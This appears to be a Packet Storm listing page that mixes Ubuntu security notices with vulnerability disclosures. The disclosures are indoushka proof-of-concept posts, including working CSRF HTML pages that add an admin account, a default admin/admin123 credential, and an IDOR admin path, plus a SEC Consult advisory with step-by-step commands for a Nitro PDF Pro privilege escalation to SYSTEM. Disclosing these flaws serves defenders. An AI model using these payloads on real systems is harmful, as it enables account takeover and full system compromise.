Event Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Event Management System v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202302/kashipara.com_event-mgt-sys-zip.zip                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] Use Payload : /admin/gallary.php[+] http://127.0.0.1/event_mgt_sys/admin/gallary.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Event Management System 1.0 Insecure Direct Object Reference

Ubuntu Security Notice 7041-2 - USN-7041-1 fixed a vulnerability in CUPS. This update provides the corresponding update for Ubuntu 18.04 LTS. Simone Margaritelli discovered that CUPS incorrectly sanitized IPP data when creating PPD files. A remote attacker could possibly use this issue to manipulate PPD files and execute arbitrary code when a printer is used.

==========================================================================  
Ubuntu Security Notice USN-7041-2  
October 01, 2024

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

CUPS could be made to crash or run programs if it received specially  
crafted network traffic.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

USN-7041-1 fixed a vulnerability in CUPS. This update provides  
the corresponding update for Ubuntu 18.04 LTS.

Original advisory details:

 Simone Margaritelli discovered that CUPS incorrectly sanitized IPP  
 data when creating PPD files. A remote attacker could possibly use this  
 issue to manipulate PPD files and execute arbitrary code when a printer is  
 used.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  cups                            2.2.7-1ubuntu2.10+esm6  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7041-2  
  https://ubuntu.com/security/notices/USN-7041-1  
  CVE-2024-47175

Ubuntu Security Notice USN-7041-2

Ubuntu Security Notice 7003-5 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-5October 01, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40916, CVE-2024-41035, CVE-2024-39469, CVE-2024-39499,CVE-2024-36978, CVE-2024-42092, CVE-2024-42087, CVE-2024-42102,CVE-2024-40978, CVE-2024-40902, CVE-2024-36974, CVE-2024-42096,CVE-2024-40974, CVE-2024-40904, CVE-2024-40905, CVE-2024-42153,CVE-2024-42106, CVE-2024-42070, CVE-2024-41097, CVE-2024-42090,CVE-2024-42105, CVE-2024-42104, CVE-2024-39502, CVE-2024-41089,CVE-2024-40945, CVE-2024-38619, CVE-2024-40961, CVE-2024-42127,CVE-2024-39487, CVE-2024-40988, CVE-2024-41044, CVE-2024-42236,CVE-2024-40942, CVE-2024-39506, CVE-2024-39509, CVE-2024-39503,CVE-2024-40934, CVE-2024-40959, CVE-2024-42101, CVE-2024-40960,CVE-2024-40968, CVE-2024-41087, CVE-2023-52803, CVE-2024-40987,CVE-2024-40943, CVE-2024-42089, CVE-2023-52887, CVE-2024-37078,CVE-2024-42148, CVE-2024-36894, CVE-2024-42097, CVE-2024-41006,CVE-2024-40984, CVE-2024-40963, CVE-2024-42223, CVE-2024-40912,CVE-2024-42086, CVE-2024-41049, CVE-2024-42157, CVE-2024-41034,CVE-2024-42145, CVE-2024-42124, CVE-2024-40995, CVE-2024-42224,CVE-2024-40981, CVE-2024-41095, CVE-2024-40901, CVE-2024-42115,CVE-2024-41041, CVE-2024-41007, CVE-2024-39505, CVE-2024-40932,CVE-2024-39495, CVE-2024-40980, CVE-2024-42084, CVE-2024-41046,CVE-2024-42119, CVE-2024-42076, CVE-2024-42232, CVE-2024-39501,CVE-2024-40958, CVE-2024-40941, CVE-2024-42093, CVE-2024-42094,CVE-2024-42154)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-5.4.0-1116-raspi    5.4.0-1116.128~18.04.1          Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1116.128~18.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-5  https://ubuntu.com/security/notices/USN-7003-4  https://ubuntu.com/security/notices/USN-7003-3  https://ubuntu.com/security/notices/USN-7003-2  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236

Ubuntu Security Notice USN-7003-5

Student Attendance Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System v1.0 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Attendance Management System 1.0 Insecure Settings

Printing Business Records Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Printing Business Records Management System v1.0 CSRF Add ADmin Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_pbrms-0-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/pbrms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Printing Business Records Management System 1.0 Cross Site Request Forgery

Online Eyewear Shop version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Eyewear Shop v1.0 CSRF Add ADmin Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_php-oews-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/oews/admin/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online Eyewear Shop 1.0 Cross Site Request Forgery

This archive contains all of the 522 exploits added to Packet Storm in September, 2024. Please note the increase in size for this month is due to a massive backlog of older exploits being added to the archive and is not representative of an uptick in new issues being discovered.

Packet Storm New Exploits For September, 2024

The Nitro PDF Pro application uses a .msi installer file (embedded into an executable .exe installer file) for installation. The MSI installer uses custom actions in repair mode in an unsafe way. Attackers with low-privileged system access to a Windows system where Nitro PDF Pro is installed, can exploit the cached MSI installer's custom actions to effectively escalate privileges and get a command prompt running in context of NT AUTHORITY\SYSTEM. Versions prior to 14.26.1.0 and 13.70.8.82 and affected.

SEC Consult Vulnerability Lab Security Advisory < 20240930-0 >  
=======================================================================  
              title: Local Privilege Escalation via MSI Installer  
            product: Nitro PDF Pro  
 vulnerable version: <14.26.1.0  
                     <13.70.8.82  
      fixed version: 14.26.1.0 or higher  
                     13.70.8.82 or higher  
         CVE number: CVE-2024-35288  
             impact: high  
           homepage: https://www.gonitro.com/  
              found: 2023-12-19  
                 by: Sandro Einfeldt  
                     Michael Baer (Office Munich)  
                     SEC Consult Vulnerability Lab 

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are on a mission to deliver a one-of-a-kind platform that accelerates   
document productivity for businesses around the world.

Nitro was born in a bustling Melbourne laneway back in 2005. It started   
with a team of three, a single product and a goal to provide the world   
with better tools for everyday work. Our team now spans the globe and   
works with over half of the Fortune 500, but we haven't strayed too far   
from our roots. We put our customers, employees, and communities at the   
center of everything we do."

Source: https://www.gonitro.com/about/our-story

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)   
The Nitro PDF Pro application uses a .msi installer file (embedded into an   
executable .exe installer file) for installation. The MSI installer uses custom   
actions in repair mode in an unsafe way. Attackers with low-privileged system   
access to a Windows system where Nitro PDF Pro is installed, can exploit the   
cached MSI installer's custom actions to effectively escalate privileges and get   
a command prompt running in context of NT AUTHORITY\SYSTEM. 

Note:   
This attack does not work using a recent version of the Edge Browser or   
Internet Explorer. A different browser, such as Chrome or Firefox, needs to be   
used. Also make sure, that Edge or IE have not been set as default browser  
and that Firefox or Chrome are not running before attempting to exploit it.  
Otherwise, the spawned process would be running with your own permissions and  
the installer will just add a new tab to the browser, instead of spawning a  
new process with SYSTEM.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via MSI Installer (CVE-2024-35288)  
After the installation of the software in standard configuration, any low-  
privileged user can access the cached (randomly named) .msi file in the   
following directory:

C:\Windows\Installer

A low privileged attacker can start the installer in repair mode   
(which is then running with SYSTEM privileges) without UAC popping up,   
by using the following command:

msiexec.exe /fa C:\Installer\<installer name>.msi

At the end of the repair process, three sub-processes (certutil.exe), called   
by MSI custom actions, perform the following operations:

[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-certificate-authority.cer"  
[SystemFolder]CertUtil –addstore –f "ca" "[APPLICATIONFOLDER]notarius-root-certificate-authority_2021-2036.cer"  

The previously mentioned operations get executed in a conhost.exe window in   
the context of NT AUTHORITY\SYSTEM. The attacker can use the appearing   
conhost.exe windows to get an elevated command prompt. Therefore, the attacker   
has to interrupt the execution flow of one of the certutil operations before   
the conhost.exe window closes. This can be done by locking the file operations   
on one of the following files:  

notarius-root-certificate-authority.cer  
notarius-certificate-authority.cer   
notarius-root-certificate-authority_2021-2036.cer

For this purpose, the attacker can use SetOpLock.exe from the following source:

https://github.com/googleprojectzero/symboliclink-testing-tools

To lock all operations on one of the previously mentioned files, the attacker  
has to use the following syntax:

while ($true) {  
   .\SetOpLock.exe <Path> x   
}

For example, to lock the operations on the first of the mentioned files, the   
following command loop can be used:

while ($true) {  
  .\SetOpLock.exe "C:\Program Files\Nitro\PDF Pro\14\notarius-root-certificate-authority.cer" x   
}

The tool will lock any operation on the file until the attacker presses Enter.  
While executing the previously mentioned msiexec-command, multiple operation  
locks will get triggered. The attacker has to skip multiple of them (by  
pressing Enter) until a conhost.exe window opens. The conhost.exe process is   
running with SYSTEM privileges and can be used to escalate privileges. The   
following steps have to be conducted:

1. Right click on the top bar of the conhost.exe window.  
2. Click on "Properties".  
3. Under options, click on the "Legacyconsolemode" link.  
4. Open the link with a browser other than Internet Explorer or Edge (both   
   don't open as SYSTEM in Windows 11).  
5. In the opened browser window press the key combination "CTRL+o".  
6. Type "C:\Windows\System32\cmd.exe" in the top bar and press Enter.

A command prompt should open with the user permission context of   
NT AUTHORITY\SYSTEM. The privileges have been escalated and the system is   
fully compromised.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* Nitro PDF Pro 14.18.1.41

According to the vendor, version branch 13 is also affected. The vendor  
confirmed that the following versions are vulnerable:

* Nitro PDF Pro <14.26.1.0  
* Nitro PDF Pro <13.70.8.82

Vendor contact timeline:  
------------------------  
2023-12-22: Contacting vendor through security@gonitro.com; asking for PGP key.  
            No response.  
2024-01-11: Asking whether our email was received  
2024-01-15: Vendor response: high workload, requesting security advisory,  
            PGP key will be shared in another email.   
2024-01-16: No PGP key received, asking again.  
2024-01-17: Sending encrypted security advisory.  
2024-01-30: Asking for a status update.  
2024-02-01: Vendor is currently investigating the issue to ensure it applies  
            to the latest version of the Pro software.  
2024-02-12: Vendor asking for tested Windows version.  
2024-02-13: Tested with Windows 10, referenced advisory information to only  
            use Firefox or Chrome browser, not Edge/IE.  
2024-03-05: Asking for a status update, if the issue could be reproduced, whether  
            we should reserve a CVE number.  
2024-03-07: Vendor will provide update in a few days, few issues in the queue.  
            Will ask internally regarding CVE.  
2024-04-08: Asking for status update. Setting advisory disclosure date  
            to 17th April.  
2024-04-08: Vendor was unable to reproduce issue, asking for a video to  
            verify the issue.  
2024-04-09: Providing POC video to the vendor.  
2024-04-11: Vendor still unable to reproduce.  
            Suggesting short call to demonstrate the issue; no response.  
2024-04-16: Asking how to proceed now.  
            Vendor: was now able to reproduce the issue on Windows 10,  
            patch implementation will be expedited.  
            Telling the vendor that we will wait for the patch, asking  
            if they reserve a CVE.  
2024-05-02: Vendor: CVE is being requested, patch is planned as soon as   
            possible.  
2024-05-02: Confirming advisory release after patch is available and   
            other necessary details (fixed version number, CVE, etc).  
2024-05-21: Vendor is still waiting for CVE.  
2024-05-22: Asking whether the issue is otherwise fixed, asking for version  
            number etc; No response.  
2024-06-17: Asking for status update again, regarding patch & CVE.  
            Fix is completed for current version 14.x, preparing a patch, but  
            also checking previous versions.  
2024-06-21: Vendor informs us that version 13 is also affected which takes  
            more time to backport.   
2024-06-24: Giving more time to patch and coordinate release versions.   
            Questions about CVE.  
2024-06-24: Vendor responds that CVE-2024-35288 can be used.  
2024-07-15: Vendor releases version 14.26.1.0 which includes the fix for v14.  
2024-09-17: Vendor informs us that security update for v13 is scheduled for  
            25th September (seems we did not receive this email).  
2024-09-23: Vendor following up regarding patch schedule & acknowledgement.  
2024-09-24: Confirming receipt of email and patch day, our advisory will be  
            scheduled for early next week.  
2024-09-24: Vendor provides affected version numbers.  
2024-09-25: Asking vendor for clarification regarding version numbers.  
2024-09-25: Vendor sends version numbers for the fix (13.70.8.82, 14.26.1.0)  
2024-09-30: Coordinated release of security advisory.

Solution:  
---------  
The vendor provides a patch in version 13.70.8.82 and 14.26.1.0 which can be  
downloaded from the following URL:  
https://www.gonitro.com/product-details/downloads/pdf-pro

The vendor released a security advisory as well:  
https://www.gonitro.com/security/updates

SEC Consult has also released a blog post on 12th September 2024 regarding MSI  
installer security issues tracked as CVE-2024-38014 and a general fix by  
Microsoft. We have contacted Microsoft to have a more general solution for  
every affected vendor. For further details check out the blog post:  
https://r.sec-consult.com/msi

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab   
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Sandro Einfeldt, Michael Baer, Johannes Greil / @2024

Nitro PDF Pro Local Privilege Escalation

An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

VICIdial Authenticated Remote Code Execution

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.